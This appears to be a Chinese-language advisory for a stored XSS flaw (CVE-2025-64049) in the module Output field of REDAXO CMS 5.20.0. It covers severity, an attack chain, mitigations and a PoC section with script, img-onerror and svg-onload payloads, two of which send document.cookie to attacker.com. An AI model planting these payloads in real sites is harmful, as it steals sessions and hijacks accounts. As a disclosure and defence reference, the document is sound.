CVE-2025-64049: REDAXO CMS 5.20.0 模块管理存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64049

漏洞类型

存储型XSS

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

REDAXO CMS 5.20.0

漏洞概述

REDAXO CMS 5.20.0版本中存在一个存储型跨站脚本攻击（Stored XSS）漏洞，存在于内容管理系统的模块管理组件中。该漏洞允许具有高权限的远程用户通过模块的Output code字段注入任意Web脚本或HTML代码。由于该payload被存储在系统数据库中，当其他用户查看或编辑包含受感染模块的文章时，恶意代码将自动执行。攻击者可以利用此漏洞窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。由于攻击需要高权限账户且需要用户交互，CVSS评分为4.8（中危），但在实际场景中仍可能造成严重的安全风险，特别是针对管理员账户的攻击。

技术细节

该漏洞的根本原因在于REDAXO CMS的模块管理功能对Output code字段的输入验证不足。攻击者以高权限用户身份登录CMS后台，导航至模块管理界面，在模块的Output code字段中注入恶意JavaScript代码。由于系统未对用户输入进行充分的HTML实体编码或输入过滤，恶意代码被直接存储在数据库中。当其他用户（尤其是内容编辑者或管理员）访问包含该模块的文章时，浏览器会解析并执行存储的恶意脚本。攻击者通常使用<script>标签、事件处理器（如onerror、onload）或JavaScript伪协议来构造payload。典型的攻击场景包括：攻击者创建一个包含XSS payload的模块，然后诱骗管理员查看或编辑使用该模块的文章，从而窃取管理员的会话凭证或执行其他恶意操作。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用REDAXO CMS 5.20.0版本，通过端口扫描或指纹识别确认CMS版本信息

STEP 2

初始访问

攻击者获取REDAXO CMS的高权限账户（如管理员或内容编辑者）凭据，可通过钓鱼、密码喷洒或社工手段获取

STEP 3

漏洞利用

登录CMS后台后，攻击者进入模块管理功能，在模块的Output code字段中注入恶意XSS payload并保存

STEP 4

触发执行

诱骗目标用户（内容编辑者或管理员）查看或编辑使用受感染模块的文章，触发存储的恶意脚本

STEP 5

数据窃取

恶意JavaScript执行后，窃取用户Cookie、会话令牌或其他敏感信息，并发送至攻击者控制的服务器

STEP 6

权限提升

攻击者利用窃取的会话凭证劫持高权限账户，进一步控制整个CMS系统或进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- REDAXO CMS 5.20.0 Stored XSS PoC -->
<!-- Module Output Code Field Payload -->
<script>alert(document.cookie)</script>

<!-- Alternative payloads -->
<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">

<svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

<!-- Steps to exploit -->
<!-- 1. Login to REDAXO CMS 5.20.0 with admin/editor privileges -->
<!-- 2. Navigate to: Modules -> Add/Edit Module -->
<!-- 3. In 'Output' code field, insert the XSS payload -->
<!-- 4. Save the module -->
<!-- 5. Create or edit an article that uses this module -->
<!-- 6. When victim views/edits the article, XSS payload executes -->

影响范围

REDAXO CMS 5.20.0

防御指南

临时缓解措施

在官方补丁发布前，可以采取以下临时缓解措施：1) 限制模块管理功能的访问权限，仅允许绝对必要的用户访问；2) 禁用非必要的模块编辑功能，使用预定义的、受信任的模块；3) 实施严格的访问控制列表（ACL），监控模块管理功能的异常访问行为；4) 在Web应用防火墙（WAF）层面添加XSS防护规则，对包含<script>、<img>、<svg>等危险标签的请求进行拦截；5) 提醒用户不要点击来源不明的链接，定期清理浏览器Cookie和会话。